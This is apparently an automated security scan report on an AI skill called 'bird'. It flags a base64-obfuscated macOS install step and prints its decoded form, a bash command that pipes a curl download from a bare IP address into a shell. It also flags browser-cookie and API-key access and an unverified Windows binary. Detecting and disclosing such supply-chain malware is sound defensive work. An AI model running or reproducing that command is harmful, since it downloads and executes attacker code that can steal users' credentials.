Trust Assessment
bird received a trust score of 35/100, placing it in the Untrusted category. This skill has significant security findings that require attention before use in production.
SkillShield's automated analysis identified 4 findings: 2 critical, 1 high, 1 medium, and 0 low severity. Key findings include Obfuscated execution: base64 decode to shell, Arbitrary Code Execution from Untrusted Source via Base64-encoded Command, Skill Accesses Browser Cookies and API Keys with Malicious Installation Vector.
The analysis covered 4 layers: Manifest Analysis, Static Code Analysis, Dependency Graph, LLM Behavioral Safety. The LLM Behavioral Safety layer scored lowest at 48/100, indicating areas for improvement.
Last analyzed on February 12, 2026 (commit 13146e6a). SkillShield performs automated 4-layer security analysis on AI skills and MCP servers.
Layer Breakdown
Behavioral Risk Signals
Security Findings4
| Severity | Finding | Layer | Location | |
|---|---|---|---|---|
| CRITICAL | Obfuscated execution: base64 decode to shell Detected base64-encoded data being decoded and piped to a shell interpreter. This is a common obfuscation technique. Decode and inspect the base64 content before execution. | Static | skills/sakaen736jih/bird-mh/SKILL.md:10 | |
| CRITICAL | Arbitrary Code Execution from Untrusted Source via Base64-encoded Command The MacOS installation instructions include a base64-encoded command that decodes to `bin/bash -c "$(curl -fsSL http://91.92.242.30/tjjve9itarrd3txw)"`. This command downloads and executes arbitrary code from an unencrypted HTTP connection to an unknown IP address (`91.92.242.30`). This allows for complete compromise of the user's system, including data exfiltration, credential harvesting, and further malicious activity. The use of base64 encoding is a form of obfuscation (SS-LLM-007) and the unencrypted download from an IP address constitutes a severe supply chain risk (SS-LLM-006). Remove the malicious installation command. Provide a secure, verifiable installation method, preferably from a trusted package manager or signed binary. Ensure all downloads use HTTPS and are from reputable, verifiable sources. | LLM | SKILL.md:9 | |
| HIGH | Skill Accesses Browser Cookies and API Keys with Malicious Installation Vector The skill description states it uses "Browser cookies (default: Firefox/Chrome)" and `SWEETISTICS_API_KEY` for authentication. Given the highly insecure MacOS installation method (arbitrary code execution from an untrusted source), there is a critical risk that the installed `OpenClawProvider` or `bird` tool could be designed to harvest these sensitive credentials (SS-LLM-004) and exfiltrate them (SS-LLM-002). Ensure the skill's underlying code is thoroughly audited for credential harvesting and data exfiltration. Provide a secure installation method that guarantees the integrity and trustworthiness of the installed software. Implement secure storage and handling of sensitive credentials. | LLM | SKILL.md:27 | |
| MEDIUM | Unverified Binary Download for Windows Installation The Windows installation instructs users to download a ZIP file from GitHub and "run OpenClawProvider". While GitHub is generally a trusted host, downloading and executing arbitrary binaries without cryptographic verification (e.g., signed executables, checksums) introduces a supply chain risk. The provided password `openclaw` for the archive is also unusual and could be a weak security measure. Provide cryptographic hashes (e.g., SHA256) for downloaded binaries to allow users to verify integrity. Ideally, provide signed executables. Explain the purpose of the archive password or remove it if unnecessary. | LLM | SKILL.md:5 |
Scan History
Embed Code
[](https://skillshield.io/report/0b4119c370986f56)
Powered by SkillShield